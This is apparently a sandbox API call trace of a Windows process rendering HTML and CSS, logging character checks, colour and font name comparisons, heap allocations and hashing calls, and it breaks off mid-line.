[0160.230] IsCharSpaceW (wch=0x3d) returned 0 [0160.230] IsCharAlphaNumericW (ch=0x3d) returned 0 [0160.230] IsCharSpaceW (wch=0x31) returned 0 [0160.230] IsCharAlphaNumericW (ch=0x31) returned 1 [0160.230] IsCharAlphaNumericW (ch=0x25) returned 0 [0160.230] IsCharSpaceW (wch=0x25) returned 0 [0160.230] IsCharAlphaNumericW (ch=0x25) returned 0 [0160.230] IsCharSpaceW (wch=0x3b) returned 0 [0160.230] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.231] IsCharSpaceW (wch=0x25) returned 0 [0160.231] IsCharSpaceW (wch=0x31) returned 0 [0160.231] IsCharSpaceW (wch=0x31) returned 0 [0160.231] IsCharSpaceW (wch=0x25) returned 0 [0160.231] IsCharSpaceW (wch=0x31) returned 0 [0160.231] IsCharSpaceW (wch=0x25) returned 0 [0160.231] IsCharSpaceW (wch=0x0) returned 0 [0160.231] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x6d96a8 [0160.231] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0160.231] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1e) returned 0x9ef3e58 [0160.231] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.232] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.232] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.232] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.232] memcpy_s (in: _Destination=0x6c5dc4, _DestinationSize=0x1e9c, _Source=0x9ee654e, _SourceSize=0x6a | out: _Destination=0x6c5dc4) returned 0x0 [0160.232] memcpy_s (in: _Destination=0x199c18, _DestinationSize=0x200, _Source=0x9ee65b8, _SourceSize=0x2 | out: _Destination=0x199c18) returned 0x0 [0160.232] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.232] StrChrW (lpStart="style", wMatch=0x3a) returned 0x0 [0160.233] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.233] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.233] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.233] IsCharSpaceW (wch=0x62) returned 0 [0160.233] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.233] IsCharSpaceW (wch=0x3a) returned 0 [0160.233] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.233] IsCharSpaceW (wch=0x20) returned 1 [0160.233] IsCharSpaceW (wch=0x62) returned 0 [0160.233] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.233] IsCharSpaceW (wch=0x3b) returned 0 [0160.233] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.233] IsCharSpaceW (wch=0x20) returned 1 [0160.233] IsCharSpaceW (wch=0x70) returned 0 [0160.233] IsCharSpaceW (wch=0x65) returned 0 [0160.233] IsCharSpaceW (wch=0x62) returned 0 [0160.233] IsCharSpaceW (wch=0x62) returned 0 [0160.233] IsCharSpaceW (wch=0x65) returned 0 [0160.234] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.234] IsCharSpaceW (wch=0x62) returned 0 [0160.234] IsCharSpaceW (wch=0x75) returned 0 [0160.234] IsCharSpaceW (wch=0x74) returned 0 [0160.234] IsCharSpaceW (wch=0x74) returned 0 [0160.234] IsCharSpaceW (wch=0x6f) returned 0 [0160.234] IsCharSpaceW (wch=0x6e) returned 0 [0160.234] IsCharSpaceW (wch=0x66) returned 0 [0160.234] IsCharSpaceW (wch=0x61) returned 0 [0160.234] IsCharSpaceW (wch=0x63) returned 0 [0160.234] IsCharSpaceW (wch=0x65) returned 0 [0160.234] IsCharSpaceW (wch=0x75) returned 0 [0160.234] IsCharSpaceW (wch=0x74) returned 0 [0160.234] IsCharSpaceW (wch=0x74) returned 0 [0160.234] IsCharSpaceW (wch=0x6f) returned 0 [0160.234] IsCharSpaceW (wch=0x6e) returned 0 [0160.234] IsCharSpaceW (wch=0x66) returned 0 [0160.234] IsCharSpaceW (wch=0x61) returned 0 [0160.234] IsCharSpaceW (wch=0x63) returned 0 [0160.234] IsCharSpaceW (wch=0x65) returned 0 [0160.234] bsearch (_Key=0x199928, _Base=0x6d81eaa8, _NumOfElements=0x94, _SizeOfElements=0x8, _PtFuncCompare=0x6dd06a80) returned 0x0 [0160.234] _wcsnicmp (_String1="buttonface", _String2="lightgrey", _MaxCount=0xa) returned -10 [0160.234] _wcsnicmp (_String1="buttonface", _String2="darkslateg", _MaxCount=0xa) returned -2 [0160.235] _wcsnicmp (_String1="buttonface", _String2="cornflower", _MaxCount=0xa) returned -1 [0160.235] _wcsnicmp (_String1="buttonface", _String2="blanchedal", _MaxCount=0xa) returned 9 [0160.235] _wcsnicmp (_String1="buttonface", _String2="burlywood", _MaxCount=0xa) returned 2 [0160.235] _wcsnicmp (_String1="buttonface", _String2="chartreuse", _MaxCount=0xa) returned -1 [0160.235] _wcsnicmp (_String1="buttonface", _String2="cadetblue", _MaxCount=0xa) returned -1 [0160.235] bsearch (_Key=0x199928, _Base=0x6d81e9c0, _NumOfElements=0x1d, _SizeOfElements=0x8, _PtFuncCompare=0x6dd06a80) returned 0x6d81e9e8 [0160.235] _wcsnicmp (_String1="buttonface", _String2="inactiveca", _MaxCount=0xa) returned -7 [0160.235] _wcsnicmp (_String1="buttonface", _String2="buttonhigh", _MaxCount=0xa) returned -2 [0160.235] _wcsnicmp (_String1="buttonface", _String2="activecapt", _MaxCount=0xa) returned 1 [0160.235] _wcsnicmp (_String1="buttonface", _String2="background", _MaxCount=0xa) returned 20 [0160.235] _wcsnicmp (_String1="buttonface", _String2="buttonface", _MaxCount=0xa) returned 0 [0160.235] IsCharSpaceW (wch=0x0) returned 0 [0160.235] _wcsnicmp (_String1="none", _String2="none", _MaxCount=0x4) returned 0 [0160.236] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x9ee6cf0 [0160.236] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.236] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.236] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.236] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.236] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.236] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x16) returned 0x6dcb60 [0160.237] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.237] IsCharSpaceW (wch=0x3a) returned 0 [0160.237] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.237] IsCharSpaceW (wch=0x20) returned 1 [0160.237] IsCharSpaceW (wch=0x61) returned 0 [0160.237] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.237] IsCharSpaceW (wch=0x3b) returned 0 [0160.237] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.237] IsCharSpaceW (wch=0xd) returned 1 [0160.237] IsCharSpaceW (wch=0xa) returned 1 [0160.237] IsCharSpaceW (wch=0x66) returned 0 [0160.237] IsCharSpaceW (wch=0x65) returned 0 [0160.237] IsCharSpaceW (wch=0x61) returned 0 [0160.237] IsCharSpaceW (wch=0x61) returned 0 [0160.237] IsCharSpaceW (wch=0x65) returned 0 [0160.237] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.237] IsCharSpaceW (wch=0x3a) returned 0 [0160.237] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.237] IsCharSpaceW (wch=0x20) returned 1 [0160.238] IsCharSpaceW (wch=0x6d) returned 0 [0160.238] IsCharAlphaNumericW (ch=0x20) returned 0 [0160.238] IsCharSpaceW (wch=0x20) returned 1 [0160.238] IsCharSpaceW (wch=0x73) returned 0 [0160.238] IsCharAlphaNumericW (ch=0x20) returned 0 [0160.238] IsCharSpaceW (wch=0x20) returned 1 [0160.238] IsCharSpaceW (wch=0x73) returned 0 [0160.238] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.238] IsCharSpaceW (wch=0x3b) returned 0 [0160.238] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.238] IsCharSpaceW (wch=0x20) returned 1 [0160.238] IsCharSpaceW (wch=0x66) returned 0 [0160.238] IsCharSpaceW (wch=0x66) returned 0 [0160.238] IsCharSpaceW (wch=0x6d) returned 0 [0160.238] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x9ef3d68 [0160.239] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.239] IsCharSpaceW (wch=0x3a) returned 0 [0160.239] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.239] IsCharSpaceW (wch=0x20) returned 1 [0160.239] IsCharSpaceW (wch=0x38) returned 0 [0160.239] IsCharAlphaNumericW (ch=0x38) returned 1 [0160.239] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.239] IsCharSpaceW (wch=0x3b) returned 0 [0160.239] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.239] IsCharSpaceW (wch=0x20) returned 1 [0160.239] IsCharSpaceW (wch=0x74) returned 0 [0160.239] IsCharSpaceW (wch=0x74) returned 0 [0160.239] IsCharSpaceW (wch=0x38) returned 0 [0160.239] IsCharSpaceW (wch=0x38) returned 0 [0160.239] IsCharSpaceW (wch=0x74) returned 0 [0160.239] IsCharSpaceW (wch=0x38) returned 0 [0160.239] IsCharSpaceW (wch=0x70) returned 0 [0160.239] IsCharSpaceW (wch=0x74) returned 0 [0160.239] IsCharSpaceW (wch=0x0) returned 0 [0160.240] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.241] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.241] IsCharSpaceW (wch=0x3a) returned 0 [0160.241] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.241] IsCharSpaceW (wch=0x20) returned 1 [0160.241] IsCharSpaceW (wch=0x32) returned 0 [0160.241] IsCharAlphaNumericW (ch=0x32) returned 1 [0160.241] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.241] IsCharSpaceW (wch=0x3b) returned 0 [0160.241] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.241] IsCharSpaceW (wch=0x20) returned 1 [0160.241] IsCharSpaceW (wch=0x77) returned 0 [0160.241] IsCharSpaceW (wch=0x6d) returned 0 [0160.241] IsCharSpaceW (wch=0x32) returned 0 [0160.241] IsCharSpaceW (wch=0x32) returned 0 [0160.241] IsCharSpaceW (wch=0x6d) returned 0 [0160.241] IsCharSpaceW (wch=0x32) returned 0 [0160.241] IsCharSpaceW (wch=0x65) returned 0 [0160.241] IsCharSpaceW (wch=0x6d) returned 0 [0160.241] IsCharSpaceW (wch=0x0) returned 0 [0160.242] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.242] IsCharSpaceW (wch=0x3a) returned 0 [0160.242] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.242] IsCharSpaceW (wch=0x20) returned 1 [0160.242] IsCharSpaceW (wch=0x31) returned 0 [0160.242] IsCharAlphaNumericW (ch=0x31) returned 1 [0160.242] IsCharAlphaNumericW (ch=0x25) returned 0 [0160.242] IsCharSpaceW (wch=0x25) returned 0 [0160.242] IsCharAlphaNumericW (ch=0x25) returned 0 [0160.242] IsCharSpaceW (wch=0x25) returned 0 [0160.242] IsCharSpaceW (wch=0x31) returned 0 [0160.242] IsCharSpaceW (wch=0x31) returned 0 [0160.242] IsCharSpaceW (wch=0x25) returned 0 [0160.242] IsCharSpaceW (wch=0x31) returned 0 [0160.242] IsCharSpaceW (wch=0x25) returned 0 [0160.242] IsCharSpaceW (wch=0x0) returned 0 [0160.242] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.242] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6d9678 [0160.243] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0160.243] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x6d8428 [0160.243] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.243] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.243] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.243] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0160.243] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x22) returned 0x6d81b8 [0160.244] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.244] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.244] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.244] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.244] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.244] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.245] StrChrW (lpStart="accesskey", wMatch=0x3a) returned 0x0 [0160.245] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.245] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x9ee6dd0 [0160.245] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.245] StrChrW (lpStart="type", wMatch=0x3a) returned 0x0 [0160.245] StrChrW (lpStart="style", wMatch=0x3a) returned 0x0 [0160.245] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.246] IsCharSpaceW (wch=0x66) returned 0 [0160.246] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.246] IsCharSpaceW (wch=0x3a) returned 0 [0160.246] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.246] IsCharSpaceW (wch=0x20) returned 1 [0160.246] IsCharSpaceW (wch=0x6d) returned 0 [0160.246] IsCharAlphaNumericW (ch=0x20) returned 0 [0160.246] IsCharSpaceW (wch=0x20) returned 1 [0160.246] IsCharSpaceW (wch=0x73) returned 0 [0160.246] IsCharAlphaNumericW (ch=0x20) returned 0 [0160.246] IsCharSpaceW (wch=0x20) returned 1 [0160.246] IsCharSpaceW (wch=0x73) returned 0 [0160.246] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.246] IsCharSpaceW (wch=0x3b) returned 0 [0160.246] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.246] IsCharSpaceW (wch=0x20) returned 1 [0160.246] IsCharSpaceW (wch=0x66) returned 0 [0160.246] IsCharSpaceW (wch=0x66) returned 0 [0160.246] IsCharSpaceW (wch=0x6d) returned 0 [0160.247] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x9ef3d40 [0160.247] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.247] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.247] IsCharSpaceW (wch=0x3a) returned 0 [0160.247] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.247] IsCharSpaceW (wch=0x20) returned 1 [0160.247] IsCharSpaceW (wch=0x38) returned 0 [0160.247] IsCharAlphaNumericW (ch=0x38) returned 1 [0160.247] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.247] IsCharSpaceW (wch=0x3b) returned 0 [0160.247] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.247] IsCharSpaceW (wch=0xd) returned 1 [0160.247] IsCharSpaceW (wch=0xa) returned 1 [0160.247] IsCharSpaceW (wch=0x77) returned 0 [0160.247] IsCharSpaceW (wch=0x74) returned 0 [0160.248] IsCharSpaceW (wch=0x38) returned 0 [0160.248] IsCharSpaceW (wch=0x38) returned 0 [0160.248] IsCharSpaceW (wch=0x74) returned 0 [0160.248] IsCharSpaceW (wch=0x38) returned 0 [0160.248] IsCharSpaceW (wch=0x70) returned 0 [0160.248] IsCharSpaceW (wch=0x74) returned 0 [0160.248] IsCharSpaceW (wch=0x0) returned 0 [0160.248] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.248] IsCharSpaceW (wch=0x3a) returned 0 [0160.248] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.248] IsCharSpaceW (wch=0x20) returned 1 [0160.248] IsCharSpaceW (wch=0x33) returned 0 [0160.248] IsCharAlphaNumericW (ch=0x33) returned 1 [0160.248] IsCharAlphaNumericW (ch=0x2e) returned 0 [0160.250] IsCharSpaceW (wch=0x2e) returned 0 [0160.250] IsCharAlphaNumericW (ch=0x2e) returned 0 [0160.250] IsCharAlphaNumericW (ch=0x38) returned 1 [0160.251] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.251] IsCharSpaceW (wch=0x3b) returned 0 [0160.251] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.251] IsCharSpaceW (wch=0x20) returned 1 [0160.251] IsCharSpaceW (wch=0x68) returned 0 [0160.251] IsCharSpaceW (wch=0x6d) returned 0 [0160.251] IsCharSpaceW (wch=0x33) returned 0 [0160.251] IsCharSpaceW (wch=0x33) returned 0 [0160.251] IsCharSpaceW (wch=0x6d) returned 0 [0160.251] IsCharSpaceW (wch=0x33) returned 0 [0160.251] IsCharSpaceW (wch=0x65) returned 0 [0160.251] IsCharSpaceW (wch=0x6d) returned 0 [0160.251] IsCharSpaceW (wch=0x0) returned 0 [0160.251] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.251] IsCharSpaceW (wch=0x3a) returned 0 [0160.251] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.251] IsCharSpaceW (wch=0x20) returned 1 [0160.251] IsCharSpaceW (wch=0x32) returned 0 [0160.251] IsCharAlphaNumericW (ch=0x32) returned 1 [0160.252] IsCharAlphaNumericW (ch=0x2e) returned 0 [0160.252] IsCharSpaceW (wch=0x2e) returned 0 [0160.252] IsCharAlphaNumericW (ch=0x2e) returned 0 [0160.252] IsCharAlphaNumericW (ch=0x32) returned 1 [0160.252] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.252] IsCharSpaceW (wch=0x3b) returned 0 [0160.252] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.252] IsCharSpaceW (wch=0x6d) returned 0 [0160.252] IsCharSpaceW (wch=0x32) returned 0 [0160.252] IsCharSpaceW (wch=0x32) returned 0 [0160.252] IsCharSpaceW (wch=0x6d) returned 0 [0160.252] IsCharSpaceW (wch=0x32) returned 0 [0160.252] IsCharSpaceW (wch=0x65) returned 0 [0160.252] IsCharSpaceW (wch=0x6d) returned 0 [0160.253] IsCharSpaceW (wch=0x0) returned 0 [0160.253] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6c10 [0160.253] StrChrW (lpStart="ID", wMatch=0x3a) returned 0x0 [0160.253] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x9ef3d90 [0160.253] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.253] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.253] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.254] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.254] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0160.254] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x6b5d20 [0160.254] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.254] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.254] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.254] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.254] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.255] StrCmpICW (pszStr1="ms sans serif", pszStr2="sans-serif") returned -6 [0160.255] StrCmpICW (pszStr1="ms sans serif", pszStr2="serif") returned -6 [0160.255] StrCmpICW (pszStr1="ms sans serif", pszStr2="monospace") returned 4 [0160.255] StrCmpICW (pszStr1="ms sans serif", pszStr2="cursive") returned 10 [0160.255] StrCmpICW (pszStr1="ms sans serif", pszStr2="fantasy") returned 7 [0160.255] StrCmpICW (pszStr1="ms sans serif", pszStr2="inherit") returned 4 [0160.255] StrCmpICW (pszStr1="ms sans serif", pszStr2="initial") returned 4 [0160.255] StrCmpICW (pszStr1="ms sans serif", pszStr2="default") returned 9 [0160.256] MulDiv (nNumber=8000, nNumerator=20, nDenominator=1000) returned 160 [0160.257] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.257] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x9ee6c20 [0160.257] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.257] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.257] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d95b8 [0160.257] HashData (in: pbData=0x6d95b8, cbData=0x1, pbHash=0x198c10, cbHash=0x2 | out: pbHash=0x198c10) returned 0x0 [0160.257] HashData (in: pbData=0x198c0c, cbData=0x4, pbHash=0x198c18, cbHash=0x2 | out: pbHash=0x198c18) returned 0x0 [0160.257] HashData (in: pbData=0x6d95bc, cbData=0xc, pbHash=0x198c14, cbHash=0x2 | out: pbHash=0x198c14) returned 0x0 [0160.257] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d95b8 | out: hHeap=0x5e0000) returned 1 [0160.258] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d96c0 [0160.258] HashData (in: pbData=0x6d96c0, cbData=0x1, pbHash=0x198c10, cbHash=0x2 | out: pbHash=0x198c10) returned 0x0 [0160.258] HashData (in: pbData=0x198c0c, cbData=0x4, pbHash=0x198c18, cbHash=0x2 | out: pbHash=0x198c18) returned 0x0 [0160.258] HashData (in: pbData=0x6d96c4, cbData=0xc, pbHash=0x198c14, cbHash=0x2 | out: pbHash=0x198c14) returned 0x0 [0160.258] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d96c0 | out: hHeap=0x5e0000) returned 1 [0160.258] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.258] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.258] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c20 | out: hHeap=0x5e0000) returned 1 [0160.258] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.259] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.260] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0160.261] GetProcAddress (hModule=0x70040000, lpProcName=0x3d) returned 0x70078c50 [0160.261] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x198ff4 | out: lpflOldProtect=0x198ff4*=0x4) returned 1 [0160.261] OpenThemeDataEx () returned 0x20002 [0160.262] GetStockObject (i=17) returned 0x18a0025 [0160.262] GetObjectW (in: h=0x18a0025, c=92, pv=0x6e898ff8 | out: pv=0x6e898ff8) returned 92 [0160.262] memcpy_s (in: _Destination=0x198e38, _DestinationSize=0x23c, _Source=0x6e781e78, _SourceSize=0x23c | out: _Destination=0x198e38) returned 0x0 [0160.263] EnumFontFamiliesExW (hdc=0x33010a5b, lpLogfont=0x198c08, lpProc=0x6dd71af0, lParam=0x198c08, dwFlags=0x0) returned 0 [0160.264] StrCmpICW (pszStr1="ms sans serif", pszStr2="sans-serif") returned -6 [0160.264] StrCmpICW (pszStr1="ms sans serif", pszStr2="serif") returned -6 [0160.264] StrCmpICW (pszStr1="ms sans serif", pszStr2="monospace") returned 4 [0160.264] StrCmpICW (pszStr1="ms sans serif", pszStr2="cursive") returned 10 [0160.264] StrCmpICW (pszStr1="ms sans serif", pszStr2="fantasy") returned 7 [0160.264] StrCmpICW (pszStr1="ms sans serif", pszStr2="inherit") returned 4 [0160.264] StrCmpICW (pszStr1="ms sans serif", pszStr2="initial") returned 4 [0160.264] StrCmpICW (pszStr1="ms sans serif", pszStr2="default") returned 9 [0160.264] MulDiv (nNumber=8000, nNumerator=20, nDenominator=1000) returned 160 [0160.472] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.472] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.472] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.472] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7c48 [0160.472] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.473] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6c70 [0160.473] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d96d8 [0160.473] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7938 [0160.473] HashData (in: pbData=0x6d96dc, cbData=0x4, pbHash=0x6d96e0, cbHash=0x2 | out: pbHash=0x6d96e0) returned 0x0 [0160.473] HashData (in: pbData=0x6d7938, cbData=0x2, pbHash=0x198f70, cbHash=0x2 | out: pbHash=0x198f70) returned 0x0 [0160.473] HashData (in: pbData=0x6d793a, cbData=0x2, pbHash=0x198f70, cbHash=0x2 | out: pbHash=0x198f70) returned 0x0 [0160.473] HashData (in: pbData=0x6d793c, cbData=0x8, pbHash=0x198f84, cbHash=0x2 | out: pbHash=0x198f84) returned 0x0 [0160.473] HashData (in: pbData=0x6d7944, cbData=0x8, pbHash=0x198f70, cbHash=0x2 | out: pbHash=0x198f70) returned 0x0 [0160.473] HashData (in: pbData=0x6d794c, cbData=0x8, pbHash=0x198f70, cbHash=0x2 | out: pbHash=0x198f70) returned 0x0 [0160.473] HashData (in: pbData=0x6d7954, cbData=0x2, pbHash=0x198f70, cbHash=0x2 | out: pbHash=0x198f70) returned 0x0 [0160.473] HashData (in: pbData=0x6d7956, cbData=0x2, pbHash=0x198f70, cbHash=0x2 | out: pbHash=0x198f70) returned 0x0 [0160.473] HashData (in: pbData=0x6d7958, cbData=0x8, pbHash=0x198f70, cbHash=0x2 | out: pbHash=0x198f70) returned 0x0 [0160.473] HashData (in: pbData=0x6d7960, cbData=0x8, pbHash=0x198f70, cbHash=0x2 | out: pbHash=0x198f70) returned 0x0 [0160.473] HashData (in: pbData=0x198f9c, cbData=0x4, pbHash=0x198f88, cbHash=0x2 | out: pbHash=0x198f88) returned 0x0 [0160.474] HashData (in: pbData=0x6d796c, cbData=0x8, pbHash=0x198f84, cbHash=0x2 | out: pbHash=0x198f84) returned 0x0 [0160.474] HashData (in: pbData=0x6d7974, cbData=0x8, pbHash=0x198f70, cbHash=0x2 | out: pbHash=0x198f70) returned 0x0 [0160.474] HashData (in: pbData=0x6d7980, cbData=0x4, pbHash=0x198f84, cbHash=0x2 | out: pbHash=0x198f84) returned 0x0 [0160.474] HashData (in: pbData=0x6d7984, cbData=0x8, pbHash=0x198f84, cbHash=0x2 | out: pbHash=0x198f84) returned 0x0 [0160.474] HashData (in: pbData=0x6d798c, cbData=0x8, pbHash=0x198f70, cbHash=0x2 | out: pbHash=0x198f70) returned 0x0 [0160.474] HashData (in: pbData=0x6d7998, cbData=0x4, pbHash=0x198f84, cbHash=0x2 | out: pbHash=0x198f84) returned 0x0 [0160.474] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.474] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.474] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.474] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.474] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.474] HashData (in: pbData=0x9ee6c70, cbData=0x1, pbHash=0x198fec, cbHash=0x2 | out: pbHash=0x198fec) returned 0x0 [0160.474] HashData (in: pbData=0x199004, cbData=0x4, pbHash=0x198fec, cbHash=0x2 | out: pbHash=0x198fec) returned 0x0 [0160.474] HashData (in: pbData=0x9ee6c74, cbData=0x4, pbHash=0x199008, cbHash=0x2 | out: pbHash=0x199008) returned 0x0 [0160.475] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.475] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.475] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.475] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.475] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7c48 | out: hHeap=0x5e0000) returned 1 [0160.582] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.584] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3097940265046) returned 1 [0160.584] GetCurrentThreadId () returned 0xb48 [0160.584] GetCurrentThreadId () returned 0xb48 [0160.584] GetCurrentThreadId () returned 0xb48 [0160.584] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.584] LsSetDoc () returned 0x0 [0160.584] LsCreateLine () returned 0x0 [0160.584] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.584] RtlTryEnterCriticalSection 